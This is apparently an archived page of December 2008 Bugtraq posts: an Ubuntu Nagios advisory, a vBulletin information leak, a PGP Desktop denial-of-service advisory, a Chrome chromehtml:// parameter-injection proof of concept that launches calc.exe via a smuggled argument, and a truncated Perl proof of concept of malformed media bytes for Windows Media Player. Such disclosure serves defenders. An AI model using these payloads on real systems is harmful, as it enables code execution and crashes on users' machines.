English | Deutsch | Español | Português
 UserID:
 Passwd:
new user
 About:   Dedicated  | Advanced  | Standard  | Recurring  | No Risk  | Desktop  | Basic  | Single  | Security Seal  | FAQ
  Price/Feature Summary  | Order  | New Vulnerabilities  | Confidentiality  | Vulnerability Search
 Vulnerability   
Search   
    Search 61204 CVE descriptions
and 32582 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

===========================================================
Ubuntu Security Notice USN-698-3          December 23, 2008
nagios2 vulnerabilities
CVE-2008-5027, CVE-2008-5028
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  nagios2                         2.11-1ubuntu1.4

After a standard system upgrade you need to restart Nagios to effect
the necessary changes.

Details follow:

It was discovered that Nagios was vulnerable to a Cross-site request forgery
(CSRF) vulnerability. If an authenticated nagios user were tricked into
clicking a link on a specially crafted web page, an attacker could trigger
commands to be processed by Nagios and execute arbitrary programs. This
update alters Nagios behaviour by disabling submission of CMD_CHANGE commands.
(CVE-2008-5028)

It was discovered that Nagios did not properly parse commands submitted using
the web interface. An authenticated user could use a custom form or a browser
addon to bypass security restrictions and submit unauthorized commands.
(CVE-2008-5027)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4.diff.gz
      Size/MD5:    37439 1e9c238bb21704f42d6275c31cf99108
    http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4.dsc
      Size/MD5:     1174 99b9d7ca524be867d538f8f39d52f0cf
    http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11.orig.tar.gz
      Size/MD5:  1741962 058c1f4829de748b42da1b584cccc941

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-common_2.11-1ubuntu1.4_all.deb
      Size/MD5:    61506 c4f5c96b1c8be0e58c362eb005efba9c
    http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-doc_2.11-1ubuntu1.4_all.deb
      Size/MD5:  1135002 0515ced55e66978706203bdac4055b39

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_amd64.deb
      Size/MD5:  1640150 d23994c62750473a55138f10935318b6
    http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_amd64.deb
      Size/MD5:  1106218 d2ca0e16009ae6738cae6efd29f243df

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_i386.deb
      Size/MD5:  1552138 4a165fc1202e3dcc4c7af4eeaa8f14cb
    http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_i386.deb
      Size/MD5:   987174 73ba6b8faef90259a965ad3c2aee176e

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_lpia.deb
      Size/MD5:  1586750 161d8bbc1d2f8251aa0888c326152763
    http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_lpia.deb
      Size/MD5:   999124 984199f0814041fb1d3be332c78a1084

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_powerpc.deb
      Size/MD5:  1609376 fc3975c98bf065371fd8a0230d1007c5
    http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_powerpc.deb
      Size/MD5:  1109530 a5e36a48935587ccfc565376a5ea58fa

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.4_sparc.deb
      Size/MD5:  1448326 2fc971f58d9891abd1d2babe018742ef
    http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.4_sparc.deb
      Size/MD5:   989588 158c615af339c126f07fcc8b3e05480a



--=-x9K50V1dOmiO3gJewaFy
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAklQ8tkACgkQLMAs/0C4zNqi4wCeJlJsMTMw+wesAeAV5q82o5OD
LkEAoLYDSOvuGOKZ6fwDpRIa/tlT3Tf3
=JP5M
-----END PGP SIGNATURE-----

--=-x9K50V1dOmiO3gJewaFy--

From - Wed Dec 24 17:49:39 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054e1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39025-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 2721DEDF9D
for <lists@securityspace.com>; Wed, 24 Dec 2008 17:45:29 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id E8AA7143953; Wed, 24 Dec 2008 14:11:23 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 21162 invoked from network); 23 Dec 2008 18:32:21 -0000
Date: 23 Dec 2008 18:52:12 -0000
Message-ID: <20081223185212.20539.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: xl4nothing@gmail.com
To: bugtraq@securityfocus.com
Subject: Personal Sticky Threads v1.0.3c vbulletin Add-on problem
Status:   


Personal Sticky Threads is an addon for vbulletin that allows users to create personal stickies. There appears to be a small problem when toggling the personal sticky on a thread you do not have persmission to access.

If I am denied persmission to:

http://forums.somesite.com/showthread.php?t=7

Toggling personal stickies for the thread to on I am able to view the thread title, author, and pages:

http://forums.somesite.com/misc.php?do=togglestick&threadG

This does not allow me access to the thread but does display information not intended to be viewed by me :)

From - Wed Dec 24 17:59:39 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054e2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39024-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F0188EE060
for <lists@securityspace.com>; Wed, 24 Dec 2008 17:54:26 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id C76CF14394F; Wed, 24 Dec 2008 14:05:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4301 invoked from network); 24 Dec 2008 09:01:06 -0000
Message-ID: <4951FD98.8010003@free.fr>
Date: Wed, 24 Dec 2008 10:15:04 +0100
From: Jerome Athias <jerome.athias@free.fr>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: FRHACK Registration open (Christmas offer)
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

Hi list,

###############################################
> FRHACK: IT Security Conference, France
By Hackers, For Hackers! http://www.frhack.org
###############################################

FRHACK registrations are open with a special Christmas offer (available
until January 1st 2009)
http://frhack.org/register.html

Call For Papers & Trainings is open:
http://frhack.org/cfp.html

We need sponsors!
If you can provide or offer money, materials, devices, goodies, and/or
alcohol, please contact us at: frhack-sponsor @ frhack.org

Thanks - Best regards & Take care.
Merry Christmas and Hacky New Year!

Jerome Athias
FRHACK Founder and Main organizer
http://www.frhack.org


From - Wed Dec 24 18:39:41 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054e7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39015-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id D7F49ED450
for <lists@securityspace.com>; Wed, 24 Dec 2008 18:37:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1FBA0143884; Wed, 24 Dec 2008 14:00:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14844 invoked from network); 23 Dec 2008 13:07:36 -0000
Date: Tue, 23 Dec 2008 06:11:28 -0700
Message-Id: <200812231311.mBNDBSSg020639@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: contact.fingers@gmail.com
To: bugtraq@securityfocus.com
Subject: PGP Desktop 9.0.6 Denial Of Service - ZeroDay
Status:   

---------------------------------------------------
Advisory:
PGP Desktop 9.0.6 Denial Of Service Vulnerability.

Version Affected:
PGP Desktop 9.0.6 [Build 6060] (other version could be affected)

Component Affected:
PGPwded.sys

Release Date:
Release Date. 23 December ,2008

Description:
PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input (IOCTL) and this lead to a Driver Collapse that propagates on the system with a BSOD. Affected IOCTL is 0x80022038.

Proof-of-Concept:
<a href="http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php">Click Here</a>

Credit:
Giuseppe 'Evilcry' Bonfa' (Team Lead, www.EvilFingers.com / http://evilcry.netsons.org)

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.

---------------------------------------------------

From - Wed Dec 24 18:59:40 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054e8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39026-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id AF6F7ECDA4
for <lists@securityspace.com>; Wed, 24 Dec 2008 18:57:25 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 22173143986; Wed, 24 Dec 2008 14:11:51 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 22640 invoked from network); 23 Dec 2008 19:49:15 -0000
Date: Tue, 23 Dec 2008 12:54:29 -0700
Message-Id: <200812231954.mBNJsTCV017765@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: nospam@mail.it
To: bugtraq@securityfocus.com
Subject: Google Chrome Browser (ChromeHTML://) remote parameter injection POC
Status:   

<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

From - Thu Dec 25 13:40:35 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054ea
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39027-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 62592ECC3A
for <lists@securityspace.com>; Thu, 25 Dec 2008 13:36:32 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7B75A236FB8; Thu, 25 Dec 2008 11:21:42 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11424 invoked from network); 24 Dec 2008 23:12:54 -0000
Date: 24 Dec 2008 23:32:58 -0000
Message-ID: <20081224233258.10527.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: Laurent.gaffie@gmail.com
To: bugtraq@securityfocus.com
Subject: MS Windows Media Player * (.WAV) Remote Integrer Overflow
Status:   

----------------------------------------------------------------------------------------|
MS Windows Media Player * (.WAV) Remote Integrer Overflow                               |
                                                                                        |
Application: ALL Windows Media player                                                   |
                                                                                        |
Web Site: www.microsoft.com                                                             |
                                                                                        |
Platform: Windows ALL                                                                   |
                                                                                        |
Bug: Remote Integrer Overflow                                                           |
                                                                                        |
Tested agains: WMP 9, 10, 11, vista sp1, windows 7(from the HEC leak), windows XP sp3   |
                                                                                        |
Merry-Christmas to all ;)                                                               |
----------------------------------------------------------------------------------------|
                        |
1) Introduction         |
                        |
2) Bug                  |
                        |
3) Proof of concept     |
                        |
4) Credits              |
                        |
------------------------|



------------------------|     
1) Introduction         |
                        |
------------------------|    

"Windows Media Player 11 for Windows XP offers great new ways to store and enjoy all your music, video, pictures, and recorded TV.
Play it, view it, and sync it to a portable device for enjoying on the go or even share with devices around your homeall from one place."

----------|
          |
2) Bug    |
          |
----------|
Windows Media player fails to handle exeptional condition when parsing a malformed WAV,SND,MID file.
which can lead to a remote integrer overflow.
 

--------------------|
                    |
3)Proof of concept  |
                    |
--------------------|

#!/usr/bin/perl

use strict;

my $wav "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x03\x00\xf0\x4d\x54\x72\x6b\x00\x00".
"\x00\x21\x00\xff\x51\x03\x0a\x2c\x2a\x00\xff\x58\x04\x02\x02\x18\x08\x00\xff\x03".
"\x08\x20\x20\x20\x20\x20\x20\x20\x20\x85\x88\x61\xff\x2f\x00\x4d\x54\x72\x6b\x00".
"\x00\x27\x6b\x00\xff\x03\x08\x41\x20\x42\x72\x65\x65\x7a\x65\x00\xc1\x07\x00\x07".
"\x82\x69\x91\x43\x3d\x00\x40\x3d\x64\x43\x00\x00\x40\x00\x13\x48\x3f\x00\x3f\x3f".
"\x65\x48\x00\x00\x3f\x00\x13\x45\x3f\x29\x45\x00\x13\x44\x3f\x29\x44\x00\x13\x45".
"\x65\x29\x45\x00\x13\x47\x3f\x29\x47\x00\x13\x48\x3f\x00\x40\x3f\x81\x21\x48\x00".
"\x00\x40\x00\x13\x43\x3f\x29\x43\x00\x13\x40\x3f\x29\x40\x00\x13\x3f\x3f\x29\x3f".
"\x00\x13\x40\x3f\x29\x40\x00\x13\x41\x3f\x29\x41\x00\x13\x43\x3f\x81\x21\x43\x00".
"\x13\x41\x3f\x29\x41\x00\x13\x3e\x3f\x29\x3e\x00\x13\x3c\x3f\x29\x3c\x00\x13\x40".
"\x3f\x29\x40\x00\x13\x3e\x3f\x29\x3e\x00\x13\x3b\x3f\x29\x3b\x00\x13\x39\x3f\x29".
"\x39\x00\x13\x37\x3f\x65\x37\x00\x81\x0c\x4f\x3d\x00\x4a\x3d\x00\x47\x3d\x00\x43".
"\x3d\x64\x4f\x00\x00\x4a\x00\x00\x47\x00\x00\x43\x00\x13\x43\x3f\x65\x43\x00\x13".
"\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00".
"\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40".
"\x51\x65\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13".
"\x42\x51\x29\x42\x00\x13\x43\x51\x29\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51".
"\x29\x4c\x00\x13\x4f\x54\x00\x4c\x54\x01\x43\x54\x64\x4f\x00\x00\x4c\x00\x00\x43".
"\x00\x13\x4e\x54\x00\x4b\x54\x00\x42\x54\x29\x4e\x00\x00\x4b\x00\x00\x42\x00\x13".
"\x4f\x54\x00\x4c\x54\x00\x43\x54\x65\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4c\x51".
"\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00\x00\x42".
"\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40\x51\x65".
"\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x41\x51".
"\x29\x41\x00\x13\x43\x51\x29\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51\x29\x4c".
"\x00\x13\x4f\x51\x00\x4c\x51\x01\x43\x64\x64\x4f\x00\x00\x4c\x00\x00\x43\x00\x13".
"\x4d\x51\x00\x4a\x51\x00\x42\x64\x29\x4d\x00\x00\x4a\x00\x00\x42\x00\x13\x4f\x51".
"\x00\x4c\x51\x00\x43\x64\x65\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4f\x51\x00\x43".
"\x51\x29\x4f\x00\x00\x43\x00\x13\x50\x51\x00\x44\x51\x01\x4d\x64\x28\x50\x00\x00".
"\x44\x00\x00\x4d\x00\x13\x51\x51\x00\x45\x51\x00\x4d\x64\x29\x51\x00\x00\x45\x00".
"\x00\x4d\x00\x13\x53\x51\x00\x47\x51\x00\x4d\x64\x65\x53\x00\x00\x47\x00\x00\x4d".
"\x00\x13\x4f\x51\x00\x43\x51\x00\x4d\x64\x29\x4f\x00\x00\x43\x00\x00\x4d\x00\x13".
"\x51\x51\x00\x45\x51\x00\x4d\x64\x29\x51\x00\x00\x45\x00\x00\x4d\x00\x13\x53\x51".
"\x00\x47\x51\x00\x4d\x64\x29\x53\x00\x00\x47\x00\x00\x4d\x00\x13\x54\x51\x00\x48".
"\x51\x00\x4c\x64\x29\x54\x00\x00\x48\x00\x00\x4c\x00\x13\x53\x51\x00\x47\x51\x00".
"\x4c\x64\x29\x53\x00\x00\x47\x00\x00\x4c\x00\x13\x54\x51\x00\x48\x51\x00\x4c\x64".
"\x29\x54\x00\x00\x48\x00\x00\x4c\x00\x13\x58\x51\x00\x4c\x51\x00\x4f\x64\x29\x58".
"\x00\x00\x4c\x00\x13\x58\x51\x00\x4c\x51\x29\x58\x00\x00\x4c\x00\x00\x4f\x00\x13".
"\x57\x69\x00\x4b\x69\x29\x57\x00\x00\x4b\x00\x13\x58\x69\x00\x4c\x69\x65\x58\x00".
"\x00\x4c\x00\x13\x58\x69\x29\x58\x00\x13\x56\x69\x29\x56\x00\x13\x55\x69\x29\x55".
"\x00\x13\x56\x69\x65\x56\x00\x13\x54\x69\x00\x4c\x69\x29\x54\x00\x00\x4c\x00\x13".
"\x53\x69\x00\x4a\x69\x29\x53\x00\x00\x4a\x00\x13\x51\x69\x00\x48\x69\x29\x51\x00".
"\x00\x48\x00\x13\x4f\x69\x00\x47\x69\x82\x55\x4f\x00\x00\x47\x00\x13\x4d\x69\x00".
"\x4a\x69\x01\x47\x64\x00\x43\x64\x64\x4d\x00\x00\x4a\x00\x00\x47\x00\x00\x43\x00".
"\x13\x4c\x51\x00\x43\x51\x00\x48\x64\x29\x4c\x00\x00\x43\x00\x00\x48\x00\x13\x4b".
"\x51\x00\x42\x51\x29\x4b\x00\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00".
"\x43\x00\x13\x48\x51\x00\x40\x51\x65\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00".
"\x13\x41\x51\x29\x41\x00\x13\x42\x51\x29\x42\x00\x13\x43\x51\x29\x43\x00\x13\x48".
"\x51\x29\x48\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x54\x00\x4c\x54\x01\x43\x54\x64".
"\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4e\x54\x00\x4b\x54\x00\x42\x54\x29\x4e\x00".
"\x00\x4b\x00\x00\x42\x00\x13\x4f\x54\x00\x4c\x54\x00\x43\x54\x65\x4f\x00\x00\x4c".
"\x00\x00\x43\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x4b\x51\x00".
"\x42\x51\x29\x4b\x00\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00".
"\x13\x43\x51\x65\x43\x00\x13\x46\x51\x29\x46\x00\x13\x45\x51\x29\x45\x00\x13\x44".
"\x51\x29\x44\x00\x13\x45\x51\x29\x45\x00\x13\x4a\x51\x29\x4a\x00\x13\x4d\x51\x29".
"\x4d\x00\x13\x51\x54\x00\x4d\x54\x01\x45\x54\x64\x51\x00\x00\x4d\x00\x00\x45\x00".
"\x13\x4d\x51\x29\x4d\x00\x13\x4a\x51\x29\x4a\x00\x13\x45\x51\x29\x45\x00\x13\x48".
"\x51\x00\x3e\x51\x65\x48\x00\x00\x3e\x00\x13\x45\x51\x29\x45\x00\x13\x43\x51\x29".
"\x43\x00\x13\x45\x51\x29\x45\x00\x13\x47\x51\x29\x47\x00\x13\x48\x51\x00\x40\x51".
"\x81\x21\x48\x00\x00\x40\x00\x13\x43\x51\x29\x43\x00\x13\x40\x51\x29\x40\x00\x13".
"\x3e\x51\x29\x3e\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x43\x51".
"\x81\x21\x43\x00\x13\x41\x51\x29\x41\x00\x13\x3e\x51\x29\x3e\x00\x13\x3d\x51\x29".
"\x3d\x00\x13\x40\x51\x29\x40\x00\x13\x3e\x51\x29\x3e\x00\x13\x3b\x51\x29\x3b\x00".
"\x13\x39\x51\x29\x39\x00\x13\x37\x51\x65\x37\x00\x81\x0c\x47\x51\x00\x43\x51\x64".
"\x47\x00\x00\x43\x00\x13\x43\x51\x65\x43\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00".
"\x00\x43\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00\x00\x42\x00\x13\x4c\x51\x00\x43".
"\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40\x51\x65\x48\x00\x00\x40\x00\x13\x40".
"\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x42\x51\x29\x42\x00\x13\x43\x51\x29".
"\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x54\x00\x4c\x54".
"\x01\x43\x54\x64\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4e\x54\x00\x4b\x54\x00\x42".
"\x54\x29\x4e\x00\x00\x4b\x00\x00\x42\x00\x13\x4f\x54\x00\x4c\x54\x00\x43\x54\x65".
"\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00".
"\x13\x4b\x51\x00\x42\x51\x29\x4b\x00\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c".
"\x00\x00\x43\x00\x13\x48\x51\x00\x40\x51\x65\x48\x00\x00\x40\x00\x13\x40\x51\x29".
"\x40\x00\x13\x41\x51\x29\x41\x00\x13\x41\x51\x29\x41\x00\x13\x43\x51\x29\x43\x00".
"\x13\x48\x51\x29\x48\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x54\x00\x4c\x54\x01\x43".
"\x54\x64\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4d\x54\x00\x4a\x54\x00\x42\x54\x29".
"\x4d\x00\x00\x4a\x00\x00\x42\x00\x13\x4f\x54\x00\x4c\x54\x00\x43\x54\x65\x4f\x00".
"\x00\x4c\x00\x00\x43\x00\x13\x4f\x51\x00\x43\x51\x29\x4f\x00\x00\x43\x00\x13\x50".
"\x54\x00\x44\x54\x01\x4d\x54\x28\x50\x00\x00\x44\x00\x00\x4d\x00\x13\x51\x54\x00".
"\x45\x54\x00\x4d\x54\x29\x51\x00\x00\x45\x00\x00\x4d\x00\x13\x53\x54\x00\x47\x54".
"\x00\x4d\x54\x65\x53\x00\x00\x47\x00\x00\x4d\x00\x13\x4f\x51\x00\x43\x51\x00\x4d".
"\x64\x29\x4f\x00\x00\x43\x00\x00\x4d\x00\x13\x51\x51\x00\x45\x51\x00\x4d\x64\x29".
"\x51\x00\x00\x45\x00\x00\x4d\x00\x13\x53\x51\x00\x47\x51\x00\x4d\x64\x29\x53\x00".
"\x00\x47\x00\x00\x4d\x00\x13\x54\x51\x00\x48\x51\x00\x4c\x64\x29\x54\x00\x00\x48".
"\x00\x00\x4c\x00\x13\x53\x51\x00\x47\x51\x00\x4c\x64\x29\x53\x00\x00\x47\x00\x00".
"\x4c\x00\x13\x54\x51\x00\x48\x51\x00\x4c\x64\x29\x54\x00\x00\x48\x00\x00\x4c\x00".
"\x13\x58\x63\x00\x4c\x63\x00\x4f\x63\x29\x58\x00\x00\x4c\x00\x13\x58\x63\x00\x4c".
"\x63\x29\x58\x00\x00\x4c\x00\x00\x4f\x00\x13\x57\x69\x00\x4b\x69\x29\x57\x00\x00".
"\x4b\x00\x13\x58\x69\x00\x4c\x69\x65\x58\x00\x00\x4c\x00\x13\x58\x69\x29\x58\x00".
"\x13\x56\x69\x29\x56\x00\x13\x55\x69\x29\x55\x00\x13\x56\x69\x65\x56\x00\x13\x54".
"\x69\x00\x4c\x69\x29\x54\x00\x00\x4c\x00\x13\x53\x69\x00\x4a\x69\x29\x53\x00\x00".
"\x4a\x00\x13\x51\x69\x00\x48\x69\x29\x51\x00\x00\x48\x00\x13\x4f\x69\x00\x47\x69".
"\x82\x55\x4f\x00\x00\x47\x00\x13\x4d\x69\x00\x4a\x69\x01\x47\x64\x00\x43\x64\x64".
"\x4d\x00\x00\x4a\x00\x00\x47\x00\x00\x43\x00\x13\x4c\x60\x00\x43\x60\x00\x48\x60".
"\x29\x4c\x00\x00\x43\x00\x00\x48\x00\x13\x4b\x60\x00\x42\x60\x29\x4b\x00\x00\x42".
"\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40\x51\x65".
"\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x42\x51".
"\x29\x42\x00\x13\x43\x51\x29\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51\x29\x4c".
"\x00\x13\x4f\x51\x00\x4c\x51\x01\x43\x64\x64\x4f\x00\x00\x4c\x00\x00\x43\x00\x13".
